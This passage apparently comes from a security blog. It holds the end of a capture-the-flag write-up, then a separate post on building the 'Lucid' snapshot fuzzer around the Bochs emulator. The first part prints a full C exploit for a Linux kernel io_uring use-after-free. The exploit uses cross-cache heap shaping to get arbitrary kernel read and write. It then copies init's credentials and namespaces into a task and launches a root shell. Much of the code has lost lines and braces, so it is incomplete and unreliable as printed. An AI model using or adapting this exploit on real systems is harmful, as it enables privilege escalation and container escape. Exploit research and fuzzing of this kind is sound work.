This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.

// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#include "liburing.h"

// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to 
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL

// Shared memory with child
void *g_shmem;

// Child pid
pid_t g_child = -1;

// io_uring instance to use
struct io_uring g_ring = { 0 };

// UAF file handle
int g_uaf_fd = -1;

// Track pipes
struct fd_pair {
    int fd[2];
struct fd_pair g_pipe = { 0 };

// The offset on the page where our `file` is
size_t g_off = 0;

// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };

// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;

// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;

void err(const char* format, ...)
    if (!format) {

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    fprintf(stderr, ": %s\n", strerror(errno));


void info(const char* format, ...)
    if (!format) {
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    fprintf(stderr, "%s", "\n");

// Get FD for test file
int get_test_fd(int victim)
    // These are just different for kernel debugging purposes
    char *file = NULL;
    if (victim) { file = "/etc//passwd"; }
    else { file = "/etc/passwd"; }

    int fd = open(file, O_RDONLY);
    if (fd < 0)
        err("`open()` failed, file: %s", file);

    return fd;

// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
    // Open file to register
    g_uaf_fd = get_test_fd(1);
    info("Victim fd: %d", g_uaf_fd);

    // Register the file
    int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
    if (ret)
        err("`io_uring_register_files()` failed");

    // Get hold of the sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
        err("`io_uring_get_sqe()` failed");

    // Init sqe vals
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = 0;
    sqe->flags |= IOSQE_FIXED_FILE;

    ret = io_uring_submit(&g_ring);
    if (ret < 0)
        err("`io_uring_submit()` failed");

    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);

// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
    cpu_set_t mask;
    CPU_SET(cpu_id, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
        err("`sched_setaffinity()` failed: %s", strerror(errno));


// Increase the number of FDs we can have open
void increase_fds(void)
    struct rlimit old_lim, lim;
	if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
        err("`getrlimit()` failed: %s", strerror(errno));
	lim.rlim_cur = old_lim.rlim_max;
	lim.rlim_max = old_lim.rlim_max;

	if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
		err("`setrlimit()` failed: %s", strerror(errno));

    info("Increased fd limit from %d to %d", old_lim.rlim_cur, lim.rlim_cur);


void create_pipe(void)
    if (pipe(g_pipe.fd) == -1)
        err("`pipe()` failed");

void release_pipe(void)

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
        err("`prctl()` failed");

    while (1)
        if (*(int *)g_shmem == 0x1337)
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);

        else { sleep(2); }

// Set-up environment for exploit
void setup_env(void)
    // Make sure a page is a page and we're not on some bullshit machine
    long page_sz = sysconf(_SC_PAGESIZE);
    if (page_sz != 4096L)
        err("Page size was: %ld", page_sz);

    // Pin to CPU 0
    info("Pinned process to core-0");

    // Increase FD limit

    // Create shared mem
    g_shmem = mmap(
        (void *)0x1337000,
    if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
    info("Shared memory @ 0x%lx", g_shmem);

    // Create child
    g_child = fork();
    if (g_child == -1)
        err("`fork()` failed");

    // Child
    if (g_child ==  0)
    info("Spawned child: %d", g_child);

    // Change our name
    if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
        err("`prctl()` failed");

    // Create io ring
    struct io_uring_params params = { 0 };
    if (io_uring_queue_init_params(8, &g_ring, &params))
        err("`io_uring_queue_init_params()` failed");
    info("Created io_uring");

    // Create pipe
    info("Creating pipe...");

// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
    if (io_uring_unregister_files(&g_ring))
        err("`io_uring_unregister_files()` failed");

    // Let the free actually happen

// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
    // Calculate the amount of objects to spray
    uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
    g_cc1_num = spray_amt;

    // Paranoid
    if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
        g_cc1_fds[i] = get_test_fd(0);


// Cross-cache 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
void cc_2(void)
    // Step 2:
    // Allocate OBJS_PER_SLAB to *probably* create a new active slab
    uint64_t spray_amt = OBJS_PER_SLAB - 1;
    g_cc2_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
        g_cc2_fds[i] = get_test_fd(0);


// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
    uint64_t spray_amt = OBJS_PER_SLAB + 1;
    g_cc3_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
        g_cc3_fds[i] = get_test_fd(0);


// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim 
// page in the partial list completely empty
void cc_4(void)
    //info("Freeing `filp` objects from CC2 and CC3...");
    for (size_t i = 0; i < g_cc2_num; i++)

    for (size_t i = 0; i < g_cc3_num; i++)


// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the 
// partial list and get our empty slab in the partial list freed
void cc_5(void)
    //info("Freeing `filp` objects to overflow CPU partial list...");
    for (size_t i = 0; i < g_cc1_num; i++)
        if (i % OBJS_PER_SLAB == 0)


// Reset all state associated with a cross-cache attempt
void cc_reset(void)
    // Close all the remaining FDs
    info("Resetting cross-cache state...");
    for (size_t i = 0; i < CROSS_CACHE_MAX; i++)

    // Reset number trackers
    g_cc1_num = 0;
    g_cc2_num = 0;
    g_cc3_num = 0;

// Do cross cache process
void do_cc(void)
    // Start cross-cache process

    // Allocate the victim filp

    // Free the victim filp

    // Resume cross-cache process

    // Allow pages to be freed

void reset_pipe_buf(void)
    char buf[4096] = { 0 };
    read(g_pipe.fd[PIPE_READ], buf, 4096);

void zero_pipe_buf(void)
    char buf[4096] = { 0 };
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);

// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL

// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 8 times to read 8 bytes
    uint64_t val = 0;
    for (size_t i = 0; i < 8; i++)
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
            err("`fcntl()` failed");

        // Add to val
        val |= (arg << (i * 8));

    return val;

void read_comm_at(unsigned long addr, char *comm)
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 15 times to read 15 bytes
    for (size_t i = 0; i < 8; i++)
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
            err("`fcntl()` failed");

        // Add to comm buf
        comm[i] = arg;

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;

void write_what_where(uint32_t what, uint64_t where)
    // Reset the page contents

    // Setup the fake file target ctx
    char buf[4096] = { 0 };
    write_setup_ctx(buf, what, where);

    // Set contents
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);

    // Get an sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
        err("`io_uring_get_sqe()` failed");

    // Set values
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = g_uaf_fd;

    int ret = io_uring_submit(&g_ring);
    if (ret < 0)
        err("`io_uring_submit()` failed");

    // Wait for the completion
    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);

// So in this kernel code path, after we're done with our write-what-where, the 
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_cred_where);
    write_what_where(val_2 - 1, g_cred_where + 0x4);

void overwrite_real_cred(void)
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_real_cred_where);
    write_what_where(val_2 - 1, g_real_cred_where + 0x4);

void overwrite_nsproxy(void)
    uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_nsproxy_where);
    write_what_where(val_2 - 1, g_nsproxy_where + 0x4);

// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
    if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
    else { return 0; } 

void traverse_tasks(void)
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
        err("Invalid task after init: 0x%lx", current);    

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
            g_target_task = current;

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
            g_our_task = current;

void find_pipe_buf_addr(void)
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;


void make_ring_copy(void)
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    // Adjust the files_ptr to point to our ring fd in the array
    files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Copy all the data into the buffer
    for (size_t i = 0; i < 32; i++)
        uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
        *val_ptr = read_8_at(curr_file + (i * 8));

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }

// We failed cross-cache stage, either because we didnt replace UAF object
void cc_fail(void)
    g_uaf_fd = -1;

void write_pipe(unsigned char *buf)
    if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
        err("`write()` failed");

int main(int argc, char *argv[])
    info("Setting up exploit environment...");

    // Create a debug buffer
    unsigned char buf[4096] = { 0 };
    memset(buf, 'A', 4096); 

    // Do cross-cache attempt
    info("Attempting cross-cache...");

    // Replace UAF file (and page) with pipe page

    // Try to `lseek()` which should fail if we succeeded
    if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
        printf("[!] Cross-cache failed, retrying...");
        goto retry_cc;

    // Success
    info("Cross-cache succeeded");

    // Leak the `error_entry` pointer
    uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
    info("Leaked `error_entry` address: 0x%lx", error_entry);

    // Make sure it seems kernel-ish
    if ((uint16_t)(error_entry >> 48) != 0xFFFF)
        err("Weird `error_entry` address: 0x%lx", error_entry);

    // Set kernel base
    g_kern_base = error_entry - EE_OFF;
    info("Kernel base: 0x%lx", g_kern_base);

    // Read 8 bytes at that address and see if they match our signature
    uint64_t sig = read_8_at(g_kern_base);
    if (sig != KERNEL_SIGNATURE) 
        err("Bad kernel signature: 0x%lx", sig);

    // Set init_task
    g_init_task = g_kern_base + INIT_OFF;
    info("init_task @ 0x%lx", g_init_task);

    // Get the cred and nsproxy values
    g_cred_what = read_8_at(g_init_task + CRED_OFF);
    g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);

    if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
        err("Weird init->cred value: 0x%lx", g_cred_what);

    if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
        err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);

    info("init cred address: 0x%lx", g_cred_what);
    info("init nsproxy address: 0x%lx", g_nsproxy_what);

    // Traverse the tasks list
    info("Traversing tasks linked list...");

    // Check to see if we succeeded
    if (!g_target_task) { err("Unable to find target task!"); }
    if (!g_our_task)    { err("Unable to find our task!"); }

    // We found the target task
    info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
    info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);

    // Set where gadgets
    g_cred_where = g_target_task + CRED_OFF;
    g_real_cred_where = g_target_task + REAL_CRED_OFF;
    g_nsproxy_where = g_target_task + NSPROXY_OFF;

    info("Target cred @ 0x%lx", g_cred_where);
    info("Target real_cred @ 0x%lx", g_real_cred_where);
    info("Target nsproxy @ 0x%lx", g_nsproxy_where);

    // Locate our file descriptor table
    g_files = g_our_task + FILES_OFF;
    g_fdt = read_8_at(g_files) + FDT_OFF;
    g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;

    info("Our files @ 0x%lx", g_files);
    info("Our file descriptor table @ 0x%lx", g_fdt);
    info("Our file array @ 0x%lx", g_file_array);

    // Find our pipe address
    info("UAF file addr: 0x%lx", g_file_addr);
    info("Pipe buffer addr: 0x%lx", g_pipe_buf);

    // Set the global scratch space side of the page
    info("Scratch space base @ 0x%lx", g_scratch);

    // Make a copy of our real io_uring file descriptor since we need to fake
    // one
    info("Making copy of legitimate io_uring fd...");
    info("Copy done");

    // Overwrite our task's cred with init's
    info("Overwriting our cred with init's...");

    // Make sure it's correct
    uint64_t check_cred = read_8_at(g_cred_where);
    if (check_cred != g_cred_what)
        err("check_cred: 0x%lx != g_cred_what: 0x%lx",
            check_cred, g_cred_what);

    // Overwrite our real_cred with init's cred
    info("Overwriting our real_cred with init's...");

    // Make sure it's correct
    check_cred = read_8_at(g_real_cred_where);
    if (check_cred != g_cred_what)
        err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);

    // Overwrite our nsproxy with init's
    info("Overwriting our nsproxy with init's...");

    // Make sure it's correct
    check_cred = read_8_at(g_nsproxy_where);
    if (check_cred != g_nsproxy_what)
        err("check_rec: 0x%lx != g_nsproxy_what: 0x%lx",
            check_cred, g_nsproxy_what);

    info("Creds and namespace look good!");
    // Let the child loose
    *(int *)g_shmem = 0x1337;


Fuzzer Development 1: The Soul of a New Machine

By: h0mbre
4 November 2023 at 04:00

Introduction && Credit to Gamozolabs

For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.

One approach is to lobotomize the target such that you can isolate a small subset of the target that you find β€œinteresting” and only fuzz that. That can look like a lot of things, such as ripping a small portion of a Kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input parsing routine out of a Web Browser and fuzzing just the parsing logic. This approach has its limits though, in an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this β€œinteresting” target logic. This lobotomy approach is reducing the amount of target state we can explore to a large degree. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.

Another approach, is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot fuzzing an entire Virtual Machine, we are able to fuzz complex targets such as a Web Browser or Kernel in a way that we are able to explore much more state. Nyx provides us with a way to snapshot fuzz an entire Virtual Machine/system. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the β€œreal-world”. Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But, I think given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.

And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer ontop of it, I revisited gamozolabs (Brandon Falk’s) stream paper review he did on the Nyx paper. It’s a great stream, the Nyx authors were present in Twitch chat and so there were some good back and forths and the stream really highlights what an amazing utility Nyx is for fuzzing. But something else besides Nyx piqued my interest during the stream! During the stream, Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.

This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:

  • it is relatively simple in its design,
  • it allows for almost endless introspection utilities to be added,
  • it lends itself well to iterative development cycles,
  • it can scale and be used on my servers I bought for fuzzing (but haven’t used yet because I don’t have a fuzzer!),
  • it can fuzz the Linux Kernel,
  • it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),
  • it is pretty unique in its design compared to open source fuzzing tools that exist,
  • it can be designed from scratch to work well with existing flexible tooling such as LibAFL,
  • there is no source code available anywhere publicly, so I’m free to implement it from scratch the way I see fit,
  • it can be made to be portable, ie, there is nothing stopping us for running this fuzzer on Windows instead of just Linux,
  • it will allow me to do a lot of learning and low-level computing research and learning.

So all things considered, this seemed like the ideal project to implement on the blog and so I reached out to Gamozo to make sure he’d be ok with it as I didn’t want to be seen as clout chasing off of his ideas and he was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content and we’re off to developing the fuzzer.

Also huge shoutout to @is_eqv and @ms_s3c at least two of the Nyx authors who are always super friendly and charitable with their time/answering questions. Some great people to have around.

Another huge shoutout to @Kharosx0 for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.


Please let me know if you find any programming errors or have some nitpicks with the code. I’ve tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also haven’t really fleshed out how the repository will look, or what files will be called, or anything like that so please be patient with the code-quality. This is mostly for learning purposes and at this point it is just a proof-of-concept of loading Bochs into memory to explain the first portion of the architecture.

I’ve decided to name the project β€œLucid” for now, as reference to lucid dreaming since our fuzz target is in somewhat of a dream state being executed within a simulator.


What is Bochs? Good question. Bochs is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, it’s a JIT-less, smaller, less-complex emulation tool similar to QEMU but with way less use-cases and way less performant. Instead of taking QEMU’s approach of β€œlet’s emulate anything and everything and do it with good performance”, Bochs has taken the approach of β€œlet’s emulate an entire x86 system 100% in software without worrying about performance for the most part. This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux Kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect much code changes or rapid development, the last release was over 2 years ago.

Fuzzer Architecture

This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a β€œfuzzer” process, which will execute Bochs, which in turn is executing our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs which contains the target and all of the target system’s simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.

Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our β€œfuzzer” process. In an effort to isolate Bochs from the user’s OS and Kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly this should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system, prevents Bochs from accessing any random/randomish data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data such as CPUID or something similar. I actually haven’t given much thought to the latter yet, but syscalls I have a plan for. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.

Secondly, it also means that the entirety of Bochs’ state will be contained within our sandbox, which should enable us to reset Bochs’ state more easily instead of it being a remote process. In a paradigm where Bochs executes as intended as a normal Linux process for example, resetting its state is not trivial and may require a heavy handed approach such as page table walking in the kernel for each fuzzing iteration or something even worse.

So in general, this is how our fuzzing setup should look: Fuzzer Architecture

In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. So for this, I’ve chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Let’s dive into how that has been accomplished thus far.

Loading an ELF in Memory

So in order to make this portion of loading Bochs in memory in the most simplistic way possible, I’ve chosen to compile Bochs as a -static-pie ELF. Now this means that the built ELF has no expectations about where it is loaded. In its _start routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will just be to simply build and load a -static-pie test program and make sure we can do that correctly.

In order to make sure we have everything correctly implemented, we’ll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");

        if (iters > 5) { return 0; }

Remember, at this point we don’t sandbox our loaded program at all, all we’re trying to do at this point is load it in our fuzzer virtual address space and jump to it and make sure the stack and everything is correctly setup. So we could run into issues that aren’t real issues if we jump straight into executing Bochs at this point.

